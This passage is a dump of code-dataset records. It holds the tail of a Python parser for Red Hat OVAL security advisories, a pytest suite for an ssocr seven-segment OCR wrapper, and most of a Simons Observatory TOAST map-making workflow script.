version.startswith('-'):\n version = version[1:]\n if version:\n product = vuln_product[:vuln_product.index(version) - 1].rstrip().lstrip()\n item = str(bugtraq_id) + \"#\" + product.lower() + \"#\" + str(version)\n if item not in items:\n items.add(item)\n\n\n# Gets RHSA (Red Hat Security Advisory) and RHBA (Red Hat Bug Advisory) lists from bz2 file\ndef get_rhsa_and_rhba_lists_from_file(bz2_file):\n # Init\n tar = tarfile.open(mode='r:bz2', fileobj=BytesIO(bz2_file))\n rhsa_list = []\n rhsa_id_list = []\n rhba_list = []\n rhba_id_list = []\n rhsa_info_list = []\n rhsa_info_id_list = []\n rhba_info_list = []\n rhba_info_id_list = []\n for xml_file in tar.getmembers():\n if xml_file.size > 0:\n xml_file_content = tar.extractfile(xml_file.name)\n root = ET.parse(xml_file_content).getroot().find('{http://oval.mitre.org/XMLSchema/oval-definitions-5}definitions')\n for entry in root.findall('{http://oval.mitre.org/XMLSchema/oval-definitions-5}definition'):\n # Init\n metadata = entry.find('{http://oval.mitre.org/XMLSchema/oval-definitions-5}metadata')\n detail_info = {}\n\n # Get IDs\n rhsa_id = None\n rhba_id = None\n cves = []\n for reference in metadata.findall(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}reference\"):\n # Get RHSA (Red Hat Security Advisory)\n if reference.attrib['source'] == 'RHSA':\n rhsa_id = reference.attrib['ref_id']\n if \"-\" in rhsa_id[5:]:\n rhsa_id = rhsa_id[:rhsa_id.index(\"-\", 5)]\n # RHBA (Red Hat Bug Advisory)\n if reference.attrib['source'] == 'RHBA':\n rhba_id = reference.attrib['ref_id']\n if \"-\" in rhba_id[5:]:\n rhba_id = rhba_id[:rhba_id.index(\"-\", 5)]\n # Get related CVEs\n if reference.attrib['source'] == 'CVE':\n cves.append(reference.attrib['ref_id'])\n\n detail_info['cve'] = cves\n\n # Get title and description\n detail_info['title'] = metadata.findtext('{http://oval.mitre.org/XMLSchema/oval-definitions-5}title')\n detail_info['description'] = metadata.findtext('{http://oval.mitre.org/XMLSchema/oval-definitions-5}description')\n\n # Get severity\n detail_info['severity'] = metadata.find(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}advisory\") \\\n .find(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}severity\").text\n # Append detail info\n if rhsa_id is not None:\n detail_info['rhsa_id'] = rhsa_id\n if rhsa_id not in rhsa_info_id_list:\n rhsa_info_id_list.append(rhsa_id)\n rhsa_info_list.append(detail_info)\n if rhba_id is not None:\n detail_info['rhba_id'] = rhba_id\n if rhba_id not in rhba_info_id_list:\n rhba_info_id_list.append(rhba_id)\n rhba_info_list.append(detail_info)\n\n # Get vulnerable products\n affected_cpe_list = metadata.find(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}advisory\") \\\n .find(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}affected_cpe_list\")\n for cpe in affected_cpe_list:\n if cpe.text is not None:\n info_item = {}\n splitted_product = cpe.text.split(\":\")\n info_item['vendor'] = splitted_product[2]\n info_item['product'] = splitted_product[3]\n try:\n info_item['version'] = splitted_product[4]\n except IndexError:\n info_item['version'] = '-'\n\n tmp = '#' + info_item['vendor'] + '#' + info_item['product'] + '#' + info_item['version']\n if rhsa_id is not None:\n info_item['rhsa_id'] = rhsa_id\n tmp = rhsa_id + tmp\n if tmp not in rhsa_id_list:\n rhsa_id_list.append(tmp)\n rhsa_list.append(info_item)\n if rhba_id is not None:\n info_item['rhba_id'] = rhba_id\n tmp = rhba_id + tmp\n if tmp not in rhba_id_list:\n rhba_id_list.append(tmp)\n rhba_list.append(info_item)\n\n # Return\n return rhsa_list, rhba_list, rhsa_info_list, rhba_info_list\n","sub_path":"dagda/vulnDB/ext_source_util.py","file_name":"ext_source_util.py","file_ext":"py","file_size_in_byte":15058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308031235","text":"import os\nimport sys\nimport tempfile\n\nimport pytest\n\nimport ocr\nfrom ocr import ssocr\n\nROOT = os.path.dirname(__file__)\nIMAGE_ROOT = os.path.join(ROOT, 'images')\nsix_digits_path = os.path.join(IMAGE_ROOT, 'six_digits.png')\ninside_box_path = os.path.join(IMAGE_ROOT, 'inside_box.png')\n\n\n# NOTE: This test must be first function in this module\n# because it adds the ssocr executable to the PATH\n@pytest.mark.skipif(sys.platform != 'win32', reason='non-Windows OS')\ndef test_environ_path():\n # make sure the ssocr executable is not available on PATH\n environ_path = None\n for path in os.environ['PATH'].split(os.pathsep):\n if os.path.isfile(os.path.join(path, 'ssocr.exe')):\n environ_path = path\n os.environ['PATH'] = os.environ['PATH'].replace(path, '')\n break\n\n # check that the error message is correct when the ssocr executable is not available\n with pytest.raises(FileNotFoundError, match=r'ocr.set_ssocr_path()'):\n ssocr.apply(six_digits_path, absolute_threshold=False)\n\n # make sure that the ssocr executable is available for the remainder of the tests in this module\n if environ_path:\n os.environ['PATH'] += os.pathsep + environ_path\n else:\n p = os.path.join(ROOT, '..', 'resources', 'ssocr-win64', 'bin', 'ssocr.exe')\n ssocr.set_ssocr_path(p)\n\n\ndef test_invalid_image():\n # must raise ValueError instead of FileNotFoundError\n for obj in ['does/not/exist.jpg', 'X'*10000 + '.png']:\n with pytest.raises(ValueError, match=r'^Invalid path or base64 string'):\n ssocr.apply(obj)\n\n\n@pytest.mark.parametrize('ext', ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff'])\ndef test_six_digits(ext):\n expected = '431432'\n kwargs = {'absolute_threshold': False, 'iter_threshold': True}\n\n p = tempfile.gettempdir() + '/six_digits.' + ext\n ocr.save(p, six_digits_path)\n\n assert ssocr.apply(p, **kwargs) == expected\n assert ssocr.apply(ocr.utils.to_bytes(p), **kwargs) == expected\n with open(p, mode='rb') as fp:\n assert ssocr.apply(fp.read(), **kwargs) == expected\n assert ssocr.apply(ocr.utils.to_base64(p), **kwargs) == expected\n assert ssocr.apply(ocr.utils.to_cv2(p), **kwargs) == expected\n assert ssocr.apply(ocr.utils.to_pil(p), **kwargs) == expected\n\n for fcn in [ocr.utils.to_cv2, ocr.utils.to_pil]:\n cropped = ocr.utils.crop(fcn(p), 0, 0, 100, 73)\n assert ssocr.apply(cropped, **kwargs) == expected[:2]\n\n os.remove(p)\n assert not os.path.isfile(p)\n\n\ndef test_inside_box():\n expected = '086861'\n threshold = 21. # as a percentage\n cv2 = ocr.utils.to_cv2(inside_box_path)\n pil = ocr.utils.to_pil(inside_box_path)\n for obj in [cv2, pil]:\n cropped = ocr.utils.crop(obj, 230, 195, 220, 60)\n assert ssocr.apply(cropped, threshold=threshold, absolute_threshold=False) == expected\n\n thresholded = ocr.utils.threshold(cropped, int(255 * threshold/100.))\n assert ssocr.apply(thresholded) == expected\n\n\ndef test_version():\n # explicitly match the version to check for a new release\n # when running the tests on GitHub Actions\n assert ssocr.version() == '2.22.1'\n\n info = ssocr.version(include_copyright=True)\n assert info.startswith('Seven Segment Optical Character Recognition')\n assert '@unix-ag.uni-kl.de' in info\n\n\ndef test_set_ssocr_path():\n # the file exists but the basename is not ssocr[.exe]\n for path in [__file__, six_digits_path]:\n assert os.path.isfile(path)\n with pytest.raises(FileNotFoundError, match='Invalid'):\n ssocr.set_ssocr_path(path)\n\n # a valid top-level directory but cannot find the ssocr executable\n for path in [ROOT]:\n assert os.path.isdir(path) and path.endswith('tests')\n with pytest.raises(FileNotFoundError, match='Cannot find'):\n ssocr.set_ssocr_path(path)\n\n # not a file nor a directory\n for path in ['invalid/ssocr', '/does/not/exist/ssocr.exe', 'ssocr.exe']:\n assert not os.path.exists(path)\n with pytest.raises(FileNotFoundError, match='not a valid file or directory'):\n ssocr.set_ssocr_path(path)\n\n # ensure that this does not raise an exception\n if sys.platform == 'win32':\n # finds the ssocr.exe executable in the rpi-ocr/resources/ssocr-win64 directory\n root = os.path.join(ROOT, '..')\n ssocr.set_ssocr_path(root)\n else:\n ssocr.set_ssocr_path('/usr/local/bin/ssocr')\n\n\ndef test_enums():\n for obj in ['BLACK', 'black', ssocr.Colour.BLACK]:\n assert ssocr.Colour.get_value(obj) == 'black'\n\n for obj in ['WHITE', 'white', ssocr.Colour.WHITE]:\n assert ssocr.Colour.get_value(obj) == 'white'\n\n for obj in ['Digits', 'digits', ssocr.Charset.DIGITS]:\n assert ssocr.Charset.get_value(obj) == 'digits'\n\n for obj in ['DECIMAL', 'decimal', ssocr.Charset.DECIMAL]:\n assert ssocr.Charset.get_value(obj) == 'decimal'\n\n for obj in ['HEX', 'hex', ssocr.Charset.HEX]:\n assert ssocr.Charset.get_value(obj) == 'hex'\n\n for obj in ['FULL', 'full', ssocr.Charset.FULL]:\n assert ssocr.Charset.get_value(obj) == 'full'\n\n for obj in ['REC601', 'rec601', ssocr.Luminance.REC601]:\n assert ssocr.Luminance.get_value(obj) == 'rec601'\n\n for obj in ['REC709', 'rec709', ssocr.Luminance.REC709]:\n assert ssocr.Luminance.get_value(obj) == 'rec709'\n\n for obj in ['LINEAR', 'linear', ssocr.Luminance.LINEAR]:\n assert ssocr.Luminance.get_value(obj) == 'linear'\n\n for obj in ['MINIMUM', 'minimum', ssocr.Luminance.MINIMUM]:\n assert ssocr.Luminance.get_value(obj) == 'minimum'\n\n for obj in ['MAXIMUM', 'maximum', ssocr.Luminance.MAXIMUM]:\n assert ssocr.Luminance.get_value(obj) == 'maximum'\n\n for obj in ['RED', 'red', ssocr.Luminance.RED]:\n assert ssocr.Luminance.get_value(obj) == 'red'\n\n for obj in ['GREEN', 'green', ssocr.Luminance.GREEN]:\n assert ssocr.Luminance.get_value(obj) == 'green'\n\n for obj in ['BLUE', 'blue', ssocr.Luminance.BLUE]:\n assert ssocr.Luminance.get_value(obj) == 'blue'\n\n with pytest.raises(ValueError, match=r'does not contain'):\n ssocr.Colour.get_value('invalid')\n\n with pytest.raises(ValueError, match=r'does not contain'):\n ssocr.Charset.get_value('invalid')\n\n with pytest.raises(ValueError, match=r'does not contain'):\n ssocr.Luminance.get_value('invalid')\n\n with pytest.raises(TypeError):\n ssocr.Luminance.get_value(1)\n\n\ndef test_debug_enabled():\n out = ssocr.apply(six_digits_path, iter_threshold=True, absolute_threshold=False, debug=True)\n assert out.startswith('======')\n assert 'image width: 280\\nimage height: 73' in out\n assert 'Display as seen by ssocr:' in out\n assert out.endswith('431432')\n\n\ndef test_hexadecimal_enabled():\n out = ssocr.apply(six_digits_path, iter_threshold=True, absolute_threshold=False, as_hex=True)\n assert out == '2e:6d:24:2e:6d:5d'\n\n\ndef test_absolute_threshold_enabled():\n with pytest.raises(RuntimeError, match=r'found only 1 of 6 digits'):\n ssocr.apply(six_digits_path, absolute_threshold=True, num_digits=6)\n\n\ndef test_omit_decimal_point():\n out = ssocr.apply(six_digits_path, iter_threshold=True, absolute_threshold=False, omit_decimal_point=True)\n assert out == '431432'\n","sub_path":"tests/test_ssocr.py","file_name":"test_ssocr.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245394564","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2019-2021 Simons Observatory.\n# Full license can be found in the top level \"LICENSE\" file.\n\n\"\"\"\nThis workflow runs basic data reduction and map-making:\n\n- A single MPI process group is used\n\n- All input observations are loaded and made into the output map\n\nIn particular, this script is designed for testing mapmaking techniques on data that\nalready exists on disk. It does not simulate data and it is not a full workflow for\nrunning null tests, building observation matrices, etc.\n\nYou can see the automatically generated command line options with:\n\n toast_so_map.py --help\n\nOr you can dump a config file with all the default values with:\n\n toast_so_map.py --default_toml config.toml\n\nThis script contains just comments about what is going on. For details about all the\noptions for a specific Operator, see the documentation or use the help() function from\nan interactive python session.\n\n\"\"\"\n\nimport argparse\nimport datetime\nimport os\nimport sys\nimport traceback\n\nimport numpy as np\n\nfrom astropy import units as u\n\n# Import sotodlib.toast first, since that sets default object names\n# to use in toast.\nimport sotodlib.toast as sotoast\n\nimport toast\nimport toast.ops\nfrom toast.mpi import MPI, Comm\nfrom toast.observation import default_values as defaults\n\nfrom .. import ops as so_ops\n\n# Make sure pixell uses a reliable FFT engine\nimport pixell.fft\n\npixell.fft.engine = \"fftw\"\n\n\ndef parse_config(operators, templates, comm):\n \"\"\"Parse command line arguments and load any config files.\n\n Return the final config, remaining args, and job size args.\n\n \"\"\"\n # Argument parsing\n parser = argparse.ArgumentParser(description=\"Make maps of SO data\")\n\n # Arguments specific to this script\n\n parser.add_argument(\n \"--obs_hdf5\",\n required=False,\n action=\"extend\",\n nargs=\"*\",\n help=\"Path to a TOAST hdf5 observation dump (can use multiple times)\",\n )\n\n parser.add_argument(\n \"--obs_book\",\n required=False,\n action=\"extend\",\n nargs=\"*\",\n help=\"Path to a L3 book directory (can use multiple times)\",\n )\n\n parser.add_argument(\n \"--obs_raw\",\n required=False,\n action=\"extend\",\n nargs=\"*\",\n help=\"Path to raw data directory (can use multiple times)\",\n )\n\n parser.add_argument(\n \"--band\",\n required=False,\n default=None,\n help=\"Only use detectors from this band (e.g. LAT_f150, SAT_f040)\",\n )\n\n parser.add_argument(\n \"--wafer_slots\",\n required=False,\n default=None,\n help=\"Comma-separated list of wafer slots to use. \",\n )\n\n parser.add_argument(\n \"--out_dir\",\n required=False,\n type=str,\n default=\"output_maps\",\n help=\"The output directory\",\n )\n\n # Build a config dictionary starting from the operator defaults, overriding with any\n # config files specified with the '--config' commandline option, followed by any\n # individually specified parameter overrides.\n\n config, args, jobargs = toast.parse_config(\n parser,\n operators=operators,\n templates=templates,\n )\n\n # Create our output directory\n if comm is None or comm.rank == 0:\n if not os.path.isdir(args.out_dir):\n os.makedirs(args.out_dir, exist_ok=True)\n\n # Log the config that was actually used at runtime.\n outlog = os.path.join(args.out_dir, \"config_log.toml\")\n toast.config.dump_toml(outlog, config, comm=comm)\n\n return config, args, jobargs\n\n\ndef use_full_pointing(job):\n # Are we using full pointing? We determine this from whether the binning operator\n # used in the solve has full pointing enabled.\n full_pointing = False\n if job.operators.binner.full_pointing:\n full_pointing = True\n return full_pointing\n\n\ndef job_create(config, comm):\n # Instantiate our objects that were configured from the command line / files\n job = toast.create_from_config(config)\n\n # For this workflow, we will just use one process group\n full_pointing = use_full_pointing(job)\n if comm is None:\n group_size = 1\n else:\n group_size = comm.size\n return job, group_size, full_pointing\n\n\ndef select_pointing(job, args, data):\n \"\"\"Select the pixelization scheme for both the solver and final binning.\"\"\"\n log = toast.utils.Logger.get()\n\n ops = job.operators\n\n n_enabled_solve = np.sum(\n [\n ops.pixels_wcs_azel.enabled,\n ops.pixels_wcs_radec.enabled,\n ops.pixels_healpix_radec.enabled,\n ]\n )\n if n_enabled_solve != 1:\n raise RuntimeError(\n \"Only one pixelization operator should be enabled for the solver.\"\n )\n\n n_enabled_final = np.sum(\n [\n ops.pixels_wcs_azel_final.enabled,\n ops.pixels_wcs_radec_final.enabled,\n ops.pixels_healpix_radec_final.enabled,\n ]\n )\n if n_enabled_final > 1:\n raise RuntimeError(\n \"At most, one pixelization operator can be enabled for the final binning.\"\n )\n\n # Configure Az/El and RA/DEC boresight and detector pointing and weights\n\n ops.det_pointing_azel.boresight = defaults.boresight_azel\n ops.det_pointing_radec.boresight = defaults.boresight_radec\n\n ops.pixels_wcs_azel.detector_pointing = ops.det_pointing_azel\n ops.pixels_wcs_radec.detector_pointing = ops.det_pointing_radec\n ops.pixels_healpix_radec.detector_pointing = ops.det_pointing_radec\n\n ops.pixels_wcs_azel_final.detector_pointing = ops.det_pointing_azel\n ops.pixels_wcs_radec_final.detector_pointing = ops.det_pointing_radec\n ops.pixels_healpix_radec_final.detector_pointing = ops.det_pointing_radec\n\n ops.weights_azel.detector_pointing = ops.det_pointing_azel\n ops.weights_radec.detector_pointing = ops.det_pointing_radec\n\n if job.has_HWP:\n ops.weights_azel.hwp_angle = defaults.hwp_angle\n ops.weights_radec.hwp_angle = defaults.hwp_angle\n\n # Select Pixelization and weights for solve and final binning\n\n if ops.pixels_wcs_azel.enabled:\n job.pixels_solve = ops.pixels_wcs_azel\n job.weights_solve = ops.weights_azel\n elif ops.pixels_wcs_radec.enabled:\n job.pixels_solve = ops.pixels_wcs_radec\n job.weights_solve = ops.weights_radec\n else:\n job.pixels_solve = ops.pixels_healpix_radec\n job.weights_solve = ops.weights_radec\n job.weights_final = job.weights_solve\n\n if n_enabled_final == 0:\n # Use same as solve\n job.pixels_final = job.pixels_solve\n else:\n if ops.pixels_wcs_azel_final.enabled:\n job.pixels_final = ops.pixels_wcs_azel_final\n elif ops.pixels_wcs_radec_final.enabled:\n job.pixels_final = ops.pixels_wcs_radec_final\n else:\n job.pixels_final = ops.pixels_healpix_radec_final\n log.info_rank(\n f\"Template solve using pixelization: {job.pixels_solve.name}\",\n comm=data.comm.comm_world,\n )\n log.info_rank(\n f\"Template solve using weights: {job.weights_solve.name}\",\n comm=data.comm.comm_world,\n )\n log.info_rank(\n f\"Final binning using pixelization: {job.pixels_final.name}\",\n comm=data.comm.comm_world,\n )\n log.info_rank(\n f\"Final binning using weights: {job.weights_final.name}\",\n comm=data.comm.comm_world,\n )\n\n\ndef load_data(job, args, toast_comm):\n log = toast.utils.Logger.get()\n ops = job.operators\n tmpls = job.templates\n\n # Create the (initially empty) data\n\n data = toast.Data(comm=toast_comm)\n\n # Timer for reporting the progress\n timer = toast.timing.Timer()\n timer.start()\n\n ops.mem_count.prefix = \"Before Data Load\"\n ops.mem_count.apply(data)\n\n # Load all of our toast HDF5 datasets\n\n job.has_HWP = False\n for hobs in list(args.obs_hdf5):\n log.info_rank(f\"Starting load of HDF5 data {hobs}\", comm=data.comm.comm_group)\n ob = toast.io.load_hdf5(\n hobs,\n toast_comm,\n process_rows=toast_comm.group_size,\n meta=None,\n detdata=None,\n shared=None,\n intervals=None,\n force_serial=True,\n )\n if defaults.hwp_angle in ob.shared:\n job.has_HWP = True\n # print(\"boresight_radec: \", ob.shared[\"boresight_radec\"].data)\n # print(\"boresight_azel: \", ob.shared[\"boresight_azel\"].data)\n # print(\"shared_flags: \", ob.shared[\"flags\"].data)\n # bad = (ob.shared[\"flags\"].data & defaults.shared_mask_invalid) != 0\n # print(\"shared_flags invalid: \", np.count_nonzero(bad))\n # print(\"det_flags: \", ob.detdata[\"flags\"].data)\n # print(\"noise: \", ob[\"noise_model\"])\n data.obs.append(ob)\n log.info_rank(\n f\"Finished load of HDF5 data {hobs} in\",\n comm=data.comm.comm_group,\n timer=timer,\n )\n ops.mem_count.prefix = f\"After Loading {hobs}\"\n ops.mem_count.apply(data)\n\n # Load all of our book directories\n if args.obs_book is not None and len(args.obs_book) > 0:\n raise NotImplementedError(\"Book loading not supported until PR #183 is merged\")\n\n # Load raw data\n if args.obs_raw is not None and len(args.obs_raw) > 0:\n raise NotImplementedError(\"Raw loading not supported until PR #183 is merged\")\n\n if len(data.obs) == 0:\n raise RuntimeError(\"No input data specified!\")\n\n return data\n\n\ndef reduce_data(job, args, data):\n log = toast.utils.Logger.get()\n ops = job.operators\n tmpls = job.templates\n\n world_comm = data.comm.comm_world\n\n # Timer for reporting the progress\n timer = toast.timing.Timer()\n timer.start()\n\n # Set up pointing, pixelization, and weights\n\n select_pointing(job, args, data)\n\n # Set up pointing matrices for binning operators\n\n ops.binner.pixel_pointing = job.pixels_solve\n ops.binner.stokes_weights = job.weights_solve\n\n ops.binner_final.pixel_pointing = job.pixels_final\n ops.binner_final.stokes_weights = job.weights_final\n\n # If we are not using a different binner for our final binning, use the same one\n # as the solve.\n if not ops.binner_final.enabled:\n ops.binner_final = ops.binner\n\n # Flag Sun, Moon and the planets\n\n ops.flag_sso.detector_pointing = ops.det_pointing_azel\n if ops.flag_sso.enabled:\n ops.flag_sso.apply(data)\n log.info_rank(\"Flagged SSOs in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After flagging SSOs\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"SSO Flagging disabled\", comm=world_comm)\n\n # Noise model. If noise estimation is not enabled, and no existing noise model\n # is found, then create a fake noise model with uniform weighting.\n\n noise_model = None\n\n if ops.noise_estim.enabled:\n ops.noise_estim.detector_pointing = job.pixels_final.detector_pointing\n ops.noise_estim.pixel_pointing = job.pixels_final\n ops.noise_estim.stokes_weights = job.weights_final\n ops.noise_estim.pixel_dist = ops.binner_final.pixel_dist\n ops.noise_estim.output_dir = args.out_dir\n ops.noise_estim.apply(data)\n log.info_rank(\"Estimated noise in\", comm=world_comm, timer=timer)\n\n if ops.noise_fit.enabled:\n ops.noise_fit.apply(data)\n log.info_rank(\"Fit noise model in\", comm=world_comm, timer=timer)\n log.info_rank(\"Using noise model from 1/f fit\", comm=world_comm)\n noise_model = ops.noise_fit.out_model\n else:\n log.info_rank(\"Using noise model from raw estimate\", comm=world_comm)\n noise_model = ops.noise_estim.out_model\n else:\n have_noise = True\n for ob in data.obs:\n if \"noise_model\" not in ob:\n have_noise = False\n if have_noise:\n log.info_rank(\"Using noise model from data files\", comm=world_comm)\n noise_model = \"noise_model\"\n else:\n for ob in data.obs:\n (estrate, _, _, _, _) = toast.utils.rate_from_times(\n ob.shared[defaults.times].data\n )\n ob[\"fake_noise\"] = toast.noise_sim.AnalyticNoise(\n detectors=ob.all_detectors,\n rate={x: estrate * u.Hz for x in ob.all_detectors},\n fmin={x: 1.0e-5 * u.Hz for x in ob.all_detectors},\n fknee={x: 0.0 * u.Hz for x in ob.all_detectors},\n alpha={x: 1.0 for x in ob.all_detectors},\n NET={\n x: 1.0 * u.K * np.sqrt(1.0 * u.second) for x in ob.all_detectors\n },\n )\n log.info_rank(\n \"Using fake noise model with uniform weighting\", comm=world_comm\n )\n noise_model = \"fake_noise\"\n ops.binner.noise_model = noise_model\n ops.binner_final.noise_model = noise_model\n\n # Optional geometric factors\n\n ops.h_n.pixel_pointing = job.pixels_final\n ops.h_n.pixel_dist = ops.binner_final.pixel_dist\n ops.h_n.noise_model = noise_model\n ops.h_n.output_dir = args.out_dir\n if ops.h_n.enabled:\n ops.h_n.apply(data)\n log.info_rank(\"Calculated h_n in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After h_n map\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"H_n map calculation disabled\", comm=world_comm)\n\n ops.cadence_map.pixel_pointing = job.pixels_final\n ops.cadence_map.pixel_dist = ops.binner_final.pixel_dist\n ops.cadence_map.output_dir = args.out_dir\n if ops.cadence_map.enabled:\n ops.cadence_map.apply(data)\n log.info_rank(\"Calculated cadence map in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After cadence map\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Cadence map calculation disabled\", comm=world_comm)\n\n ops.crosslinking.pixel_pointing = job.pixels_final\n ops.crosslinking.pixel_dist = ops.binner_final.pixel_dist\n ops.crosslinking.output_dir = args.out_dir\n if ops.crosslinking.enabled:\n ops.crosslinking.apply(data)\n log.info_rank(\"Calculated crosslinking in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After crosslinking map\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Crosslinking map calculation disabled\", comm=world_comm)\n\n # Collect signal statistics before filtering\n\n ops.raw_statistics.output_dir = args.out_dir\n if ops.raw_statistics.enabled:\n ops.raw_statistics.apply(data)\n log.info_rank(\"Calculated raw statistics in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After raw statistics\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Raw statistics disabled\", comm=world_comm)\n\n # Deconvolve a time constant\n\n if ops.deconvolve_time_constant.enabled:\n ops.deconvolve_time_constant.apply(data)\n log.info_rank(\"Deconvolved time constant in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After deconvolving time constant\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Timeconstant deconvolution disabled\", comm=world_comm)\n\n # Run ML mapmaker\n\n ops.mlmapmaker.out_dir = args.out_dir\n if ops.mlmapmaker.enabled:\n ops.mlmapmaker.apply(data)\n log.info_rank(\"Finished ML map-making in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"ML map-making disabled\", comm=world_comm)\n\n # Apply the filter stack\n\n log.info_rank(\"Begin Filtering\", comm=world_comm)\n\n if ops.groundfilter.enabled:\n ops.groundfilter.apply(data)\n log.info_rank(\"Finished ground-filtering in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"Ground-filtering disabled\", comm=world_comm)\n\n if ops.polyfilter1D.enabled:\n ops.polyfilter1D.apply(data)\n log.info_rank(\"Finished 1D-poly-filtering in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"1D-poly-filtering disabled\", comm=world_comm)\n\n if ops.polyfilter2D.enabled:\n ops.polyfilter2D.apply(data)\n log.info_rank(\"Finished 2D-poly-filtering in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"2D-poly-filtering disabled\", comm=world_comm)\n\n if ops.common_mode_filter.enabled:\n ops.common_mode_filter.apply(data)\n log.info_rank(\"Finished common-mode-filtering in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"common-mode-filtering disabled\", comm=world_comm)\n\n ops.mem_count.prefix = \"After filtering\"\n ops.mem_count.apply(data)\n\n # The map maker requires the binning operators used for the solve and final,\n # the templates, and the noise model.\n\n ops.mapmaker.binning = ops.binner\n\n tmpls.baselines.noise_model = noise_model\n\n ops.mapmaker.template_matrix = toast.ops.TemplateMatrix(\n templates=[tmpls.baselines,]\n )\n ops.mapmaker.map_binning = ops.binner_final\n ops.mapmaker.det_data = defaults.det_data\n ops.mapmaker.output_dir = args.out_dir\n if ops.mapmaker.enabled:\n log.info_rank(\"Begin generalized destriping map-maker\", comm=world_comm)\n # if not tmpls.baselines.enabled and not tmpls.fourier.enabled:\n if not tmpls.baselines.enabled:\n log.info_rank(\n \" No solver templates are enabled- only making a binned map\",\n comm=world_comm,\n )\n ops.mapmaker.apply(data)\n log.info_rank(\"Finished generalized destriper in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After generalized destriping map-maker\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Generalized destriping map-maker disabled\", comm=world_comm)\n\n ops.filterbin.binning = ops.binner_final\n ops.filterbin.det_data = defaults.det_data\n ops.filterbin.output_dir = args.out_dir\n if ops.filterbin.enabled:\n log.info_rank(\n \"Begin simultaneous filter/bin map-maker and observation matrix\",\n comm=world_comm,\n )\n ops.filterbin.apply(data)\n ops.mem_count.prefix = \"After simultaneous filter/bin map-maker\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Simultaneous filter/bin map-maker disabled\", comm=world_comm)\n\n if ops.mlmapmaker.enabled:\n log.info_rank(\n \"Begin ML map-maker\",\n comm=world_comm,\n )\n ops.mlmapmaker.apply(data)\n log.info_rank(\"Finished ML map-making in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"ML map-maker disabled\", comm=world_comm)\n\n # Collect signal statistics after filtering/destriping\n\n ops.filtered_statistics.output_dir = args.out_dir\n if ops.filtered_statistics.enabled:\n ops.filtered_statistics.apply(data)\n log.info_rank(\"Calculated filtered statistics in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After filtered statistics\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Filtered statistics disabled\", comm=world_comm)\n\n\ndef main():\n env = toast.utils.Environment.get()\n log = toast.utils.Logger.get()\n gt = toast.timing.GlobalTimers.get()\n gt.start(\"toast_so_map (total)\")\n timer0 = toast.timing.Timer()\n timer0.start()\n\n # Get optional MPI parameters\n comm, procs, rank = toast.get_world()\n\n if \"OMP_NUM_THREADS\" in os.environ:\n nthread = os.environ[\"OMP_NUM_THREADS\"]\n else:\n nthread = 1\n log.info_rank(\n f\"Executing workflow with {procs} MPI tasks, each with \"\n f\"{nthread} OpenMP threads at {datetime.datetime.now()}\",\n comm,\n )\n\n mem = toast.utils.memreport(msg=\"(whole node)\", comm=comm, silent=True)\n log.info_rank(f\"Start of the workflow: {mem}\", comm)\n\n # The operators we want to configure from the command line or a parameter file.\n # We will use other operators, but these are the ones that the user can configure.\n # The \"name\" of each operator instance controls what the commandline and config\n # file options will be called.\n #\n # We can also set some default values here for the traits, including whether an\n # operator is disabled by default.\n\n operators = [\n toast.ops.PointingDetectorSimple(name=\"det_pointing_azel\", quats=\"quats_azel\"),\n toast.ops.PointingDetectorSimple(\n name=\"det_pointing_radec\", quats=\"quats_radec\"\n ),\n toast.ops.StokesWeights(\n name=\"weights_azel\", weights=\"weights_azel\", mode=\"IQU\"\n ),\n toast.ops.StokesWeights(name=\"weights_radec\", mode=\"IQU\"),\n toast.ops.PixelsHealpix(\n name=\"pixels_healpix_radec\",\n enabled=False,\n ),\n toast.ops.PixelsWCS(\n name=\"pixels_wcs_radec\",\n project=\"CAR\",\n resolution=(0.005 * u.degree, 0.005 * u.degree),\n auto_bounds=True,\n enabled=True,\n ),\n toast.ops.PixelsWCS(\n name=\"pixels_wcs_azel\",\n project=\"CAR\",\n resolution=(0.05 * u.degree, 0.05 * u.degree),\n auto_bounds=True,\n enabled=False,\n ),\n toast.ops.NoiseEstim(\n name=\"noise_estim\",\n out_model=\"estimated_noise\",\n enabled=False,\n ),\n toast.ops.FitNoiseModel(\n name=\"noise_fit\",\n noise_model=\"estimated_noise\",\n out_model=\"estimated_noise_fit\",\n enabled=False,\n ),\n toast.ops.FlagSSO(name=\"flag_sso\", enabled=False),\n so_ops.Hn(name=\"h_n\", enabled=False),\n toast.ops.CadenceMap(name=\"cadence_map\", enabled=False),\n toast.ops.CrossLinking(name=\"crosslinking\", enabled=False),\n toast.ops.Statistics(name=\"raw_statistics\", enabled=False),\n toast.ops.TimeConstant(\n name=\"deconvolve_time_constant\", deconvolve=True, 